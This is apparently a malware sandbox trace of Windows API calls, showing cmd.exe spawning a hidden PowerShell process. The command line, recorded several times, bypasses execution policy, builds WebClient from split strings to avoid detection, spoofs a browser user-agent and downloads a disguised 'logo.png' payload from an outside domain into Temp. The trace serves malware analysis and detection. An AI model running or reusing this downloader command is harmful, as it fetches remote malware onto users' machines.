	[0092.510] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x26f850, lpFilePart=0x26f830 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x26f830*="Documents") returned 0x1b
	[0092.510] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0092.510] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f560 | out: lpFindFileData=0x26f560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x3fc5d0
	[0092.510] FindClose (in: hFindFile=0x3fc5d0 | out: hFindFile=0x3fc5d0) returned 1
	[0092.510] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x26f560 | out: lpFindFileData=0x26f560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x3fc5d0
	[0092.510] FindClose (in: hFindFile=0x3fc5d0 | out: hFindFile=0x3fc5d0) returned 1
	[0092.510] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x26f560 | out: lpFindFileData=0x26f560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x3fc5d0
	[0092.510] FindClose (in: hFindFile=0x3fc5d0 | out: hFindFile=0x3fc5d0) returned 1
	[0092.510] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0092.510] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0092.510] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0092.510] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0092.510] GetProcessHeap () returned 0x3e0000
	[0092.510] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad0 | out: hHeap=0x3e0000) returned 1
	[0092.510] GetEnvironmentStringsW () returned 0x3fafd0*
	[0092.511] GetProcessHeap () returned 0x3e0000
	[0092.511] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb2c) returned 0x3fbb10
	[0092.511] FreeEnvironmentStringsW (penv=0x3fafd0) returned 1
	[0092.511] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0092.511] GetProcessHeap () returned 0x3e0000
	[0092.511] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8d80 | out: hHeap=0x3e0000) returned 1
	[0092.511] GetProcessHeap () returned 0x3e0000
	[0092.511] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4016) returned 0x3fc650
	[0092.511] GetProcessHeap () returned 0x3e0000
	[0092.511] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x260) returned 0x3f9c80
	[0092.511] GetProcessHeap () returned 0x3e0000
	[0092.511] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fc650 | out: hHeap=0x3e0000) returned 1
	[0092.511] GetConsoleOutputCP () returned 0x1b5
	[0092.512] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0092.512] GetUserDefaultLCID () returned 0x409
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f960, cchData=128 | out: lpLCData="0") returned 2
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f960, cchData=128 | out: lpLCData="0") returned 2
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f960, cchData=128 | out: lpLCData="1") returned 2
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0092.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0092.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0092.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0092.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0092.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0092.513] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0092.513] GetProcessHeap () returned 0x3e0000
	[0092.513] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x20c) returned 0x3f9f60
	[0092.513] GetConsoleTitleW (in: lpConsoleTitle=0x3f9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0092.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0092.514] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0092.514] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0092.514] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0092.514] GetProcessHeap () returned 0x3e0000
	[0092.514] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4012) returned 0x3fc650
	[0092.514] GetProcessHeap () returned 0x3e0000
	[0092.514] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4010) returned 0x400670
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f49a0
	[0092.515] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f49a0 | out: hHeap=0x3e0000) returned 1
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400670 | out: hHeap=0x3e0000) returned 1
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4010) returned 0x400670
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f49a0
	[0092.515] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f49a0 | out: hHeap=0x3e0000) returned 1
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400670 | out: hHeap=0x3e0000) returned 1
	[0092.515] GetProcessHeap () returned 0x3e0000
	[0092.515] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fc650 | out: hHeap=0x3e0000) returned 1
	[0092.516] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0092.516] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0092.516] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0092.516] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0092.516] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0092.516] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0092.516] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0092.516] GetProcessHeap () returned 0x3e0000
	[0092.516] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3fa180
	[0092.516] GetProcessHeap () returned 0x3e0000
	[0092.516] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x30) returned 0x3f69a0
	[0092.516] GetProcessHeap () returned 0x3e0000
	[0092.516] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 0x3f8d80
	[0092.517] GetProcessHeap () returned 0x3e0000
	[0092.517] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3fa240
	[0092.517] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0092.518] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0092.518] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0092.518] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0092.518] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0092.518] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0092.518] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0092.518] GetProcessHeap () returned 0x3e0000
	[0092.518] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3fa300
	[0092.518] GetProcessHeap () returned 0x3e0000
	[0092.518] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2e) returned 0x3f69e0
	[0092.811] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fafd0, Size=0x68) returned 0x3fafd0
	[0092.811] GetProcessHeap () returned 0x3e0000
	[0092.811] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fafd0) returned 0x68
	[0092.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0092.811] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0092.811] GetProcessHeap () returned 0x3e0000
	[0092.811] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x170) returned 0x3e1a20
	[0092.811] GetProcessHeap () returned 0x3e0000
	[0092.811] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2d0) returned 0x3fb050
	[0092.818] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fb050, Size=0x172) returned 0x3fb050
	[0092.818] GetProcessHeap () returned 0x3e0000
	[0092.818] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb050) returned 0x172
	[0092.818] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0092.818] GetProcessHeap () returned 0x3e0000
	[0092.818] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe8) returned 0x3e1ba0
	[0092.818] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3e1ba0, Size=0x7e) returned 0x3e1ba0
	[0092.818] GetProcessHeap () returned 0x3e0000
	[0092.818] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e1ba0) returned 0x7e
	[0092.822] _get_osfhandle (_FileHandle=2) returned 0xb
	[0092.822] GetFileType (hFile=0xb) returned 0x2
	[0092.822] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0092.823] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f208 | out: lpMode=0x26f208) returned 1
	[0092.823] _get_osfhandle (_FileHandle=2) returned 0xb
	[0092.823] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x26f240 | out: lpConsoleScreenBufferInfo=0x26f240) returned 1
	[0092.823] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0092.824] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fb630, Size=0x66) returned 0x3fb630
	[0092.824] GetProcessHeap () returned 0x3e0000
	[0092.824] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb630) returned 0x66
	[0092.824] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0092.824] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0092.824] GetProcessHeap () returned 0x3e0000
	[0092.824] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x170) returned 0x3e1c30
	[0092.824] GetProcessHeap () returned 0x3e0000
	[0092.824] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2d0) returned 0x3fb6b0
	[0092.825] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fb6b0, Size=0x172) returned 0x3fb6b0
	[0092.825] GetProcessHeap () returned 0x3e0000
	[0092.825] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb6b0) returned 0x172
	[0092.825] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0092.825] GetProcessHeap () returned 0x3e0000
	[0092.825] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe8) returned 0x3fb840
	[0092.826] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fb840, Size=0x7e) returned 0x3fb840
	[0092.826] GetProcessHeap () returned 0x3e0000
	[0092.826] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb840) returned 0x7e
	[0092.827] InitializeProcThreadAttributeList (in: lpAttributeList=0x26eff8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26efb8 | out: lpAttributeList=0x26eff8, lpSize=0x26efb8) returned 1
	[0092.827] UpdateProcThreadAttribute (in: lpAttributeList=0x26eff8, dwFlags=0x0, Attribute=0x60001, lpValue=0x26efa8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26eff8, lpPreviousValue=0x0) returned 1
	[0092.827] GetStartupInfoW (in: lpStartupInfo=0x26f110 | out: lpStartupInfo=0x26f110*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0092.829] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x26f030*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe0 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x26efe0*(hProcess=0x54, hThread=0x50, dwProcessId=0xc4, dwThreadId=0x614)) returned 1
	[0092.833] CloseHandle (hObject=0x50) returned 1
	[0092.833] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0092.833] GetProcessHeap () returned 0x3e0000
	[0092.833] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbb10 | out: hHeap=0x3e0000) returned 1
	[0092.833] GetEnvironmentStringsW () returned 0x3fb8d0*
	[0092.833] GetProcessHeap () returned 0x3e0000
	[0092.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb2c) returned 0x3fc820
	[0092.833] FreeEnvironmentStringsW (penv=0x3fb8d0) returned 1
	[0092.833] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "27"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x50a08000"
	os_pid = "0xc4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "26"
	os_parent_pid = "0x4fc"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 227
	os_tid = 0x614

	[0096.906] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0097.809] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0099.146] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0099.147] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0099.147] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0099.147] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0100.418] GetVersionExW (in: lpVersionInformation=0x29e010*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29e010*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0100.420] GetVersionExW (in: lpVersionInformation=0x29e010*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29e010*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0100.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.494] GetVersionExW (in: lpVersionInformation=0x29dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0100.495] SetErrorMode (uMode=0x1) returned 0x1
	[0100.496] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x29dee0 | out: lpFileInformation=0x29dee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0100.496] SetErrorMode (uMode=0x1) returned 0x1
	[0100.500] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x29e150 | out: lpdwHandle=0x29e150) returned 0x94c
	[0100.501] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b37370 | out: lpData=0x2b37370) returned 1
	[0100.503] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29e0c8, puLen=0x29e0c0 | out: lplpBuffer=0x29e0c8*=0x2b3740c, puLen=0x29e0c0) returned 1
	[0100.505] lstrlenW (lpString="䅁") returned 1
	[0100.514] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b374e8, puLen=0x29e030) returned 1
	[0100.514] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0100.516] CoTaskMemAlloc (cb=0x2e) returned 0x4520d0
	[0100.516] lstrcpyW (in: lpString1=0x4520d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0100.517] CoTaskMemFree (pv=0x4520d0) 
	[0100.517] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b3753c, puLen=0x29e030) returned 1
	[0100.517] lstrlenW (lpString="System.Management.Automation") returned 28
	[0100.517] CoTaskMemAlloc (cb=0x3c) returned 0x404260
	[0100.517] lstrcpyW (in: lpString1=0x404260, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0100.517] CoTaskMemFree (pv=0x404260) 
	[0100.517] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b37598, puLen=0x29e030) returned 1
	[0100.517] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0100.517] CoTaskMemAlloc (cb=0x20) returned 0x45e230
	[0100.517] lstrcpyW (in: lpString1=0x45e230, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0100.517] CoTaskMemFree (pv=0x45e230) 
	[0100.517] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b375d8, puLen=0x29e030) returned 1
	[0100.517] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0100.517] CoTaskMemAlloc (cb=0x44) returned 0x404260
	[0100.517] lstrcpyW (in: lpString1=0x404260, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0100.517] CoTaskMemFree (pv=0x404260) 
	[0100.517] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x29e038, puLen=0x29e030 | out: lplpBuffer=0x29e038*=0x2b37640, puLen=0x29e030) returned 1
	[0100.517] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0100.517] CoTaskMemAlloc (cb=0x76) returned 0x3f32e0
